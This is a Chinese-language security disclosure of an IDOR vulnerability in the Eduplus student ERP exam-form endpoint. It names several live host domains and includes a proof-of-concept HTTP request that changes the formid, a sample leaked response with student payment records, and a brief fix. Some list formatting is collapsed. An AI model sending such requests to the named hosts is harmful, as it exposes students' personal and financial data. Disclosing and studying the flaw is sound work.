研究人员:Vinay Sharma
本报告详细介绍了在 Eduplus 学生 ERP 平台中发现的一个高严重性安全漏洞,具体位于学生学习者门户(learnerapi.pceterp.in)中。该应用程序在考试表单提交端点上存在**通用不安全的直接对象引用(IDOR)**漏洞,允许任何已认证用户(学生)通过操纵表单标识符来检索任何其他学生的敏感个人和财务数据。
该漏洞允许大规模收集学生记录数据,包括个人身份信息(PII)和详细的财务交易审计跟踪。
learnerapi.pceterp.in、learner.zealerp.in、learner.despu.edu.in 等POST /ExamForm/viewSubmitExamFormCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)该漏洞存在于 viewSubmitExamForm 端点中。服务器依赖两个客户端提供的参数来标识要检索的记录:
{"formid": "XXXXX"}Router-Path: /view-pcu-exam-form/XXXXXformid 关联的数据。通过遍历数字 ID,攻击者可以访问其他学生的记录。向易受攻击的端点发送带有修改后 formid 的标准 POST 请求即可获取敏感的学生数据。
请求:
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (已认证头) ...
{"formid":"28984"}
响应(泄露数据摘要):
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "[email protected]",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}





正在上传 Idorpoc.mp4…
成功利用此漏洞可能导致:
formid 是否属于与活动会话关联的 learnerid。切勿在未根据已认证会话令牌进行验证的情况下信任 formid 或 Router-Path 参数。